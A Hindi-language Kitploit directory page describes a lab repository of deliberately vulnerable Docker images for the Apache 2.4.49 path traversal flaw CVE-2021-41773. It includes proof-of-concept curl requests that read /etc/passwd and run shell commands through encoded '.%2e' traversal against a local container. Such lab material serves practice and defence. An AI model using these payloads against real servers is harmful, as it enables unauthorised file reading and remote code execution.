Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-41773 — CVE-2021-41773 के लिए कमजोर डॉकर इमेज | Kitploit
उपकरण/GitHubGitHub/blueteamsteve/cve-2021-41773
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षालैब और अभ्यास
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

CVE-2021-41773 के लिए कमजोर डॉकर इमेज

रिपॉजिटरी देखें
23894 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-41773 अपाचे पाथ ट्रैवर्सल के लिए वल्नरेबल डॉकर इमेजेज़

यह कमजोरी केवल संस्करण 2.4.49 पर लागू होती है जिसमें विशिष्ट गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन हैं। कुछ स्थितियों में यह फ़ाइल रीड या कोड एक्जीक्यूशन का परिणाम हो सकता है।

ट्वीट https://twitter.com/ptswarm/status/1445376079548624899

फ़ाइल रीड के लिए वल्नरेबल कॉन्फ़िगरेशन

कंटेनरों को सीधे Docker Hub से निम्न का उपयोग करके पुल किया जा सकता है

docker pull blueteamsteve/cve-2021-41773:no-cgid

और निम्न का उपयोग करके निष्पादित किया जा सकता है

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Apache लॉग को नीचे दिए गए का उपयोग करके देखा जा सकता है, या stdio को स्ट्रीम करने के लिए ऊपर दिए गए रन कमांड से "-dit" को हटा दें। docker logs <container-id>

फ़ाइल रीड के लिए PoC

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

वल्नरेबल RCE कॉन्फ़िगरेशन

कंटेनरों को सीधे Docker Hub से निम्न का उपयोग करके पुल किया जा सकता है

docker pull blueteamsteve/cve-2021-41773:with-cgid

और निम्न का उपयोग करके निष्पादित किया जा सकता है

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Apache लॉग को नीचे दिए गए का उपयोग करके देखा जा सकता है, या stdio को स्ट्रीम करने के लिए ऊपर दिए गए रन कमांड से "-dit" को हटा दें। docker logs <container-id>

RCE के लिए PoC

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

कस्टम डॉकर कंटेनर बनाएं

उप-निर्देशिकाओं में dockerfile और टेम्पलेट httpd.conf फ़ाइलों का उपयोग करके अपने स्वयं के संस्करणों को संशोधित और बनाएं।

  • फ़ाइल रीड के लिए वल्नरेबल कॉन्फ़िग के लिए ./no-cgi का उपयोग करें
  • कोड एक्जीक्यूशन के लिए वल्नरेबल कॉन्फ़िग के लिए ./with-cgi का उपयोग करें
टूल डाउनलोड करें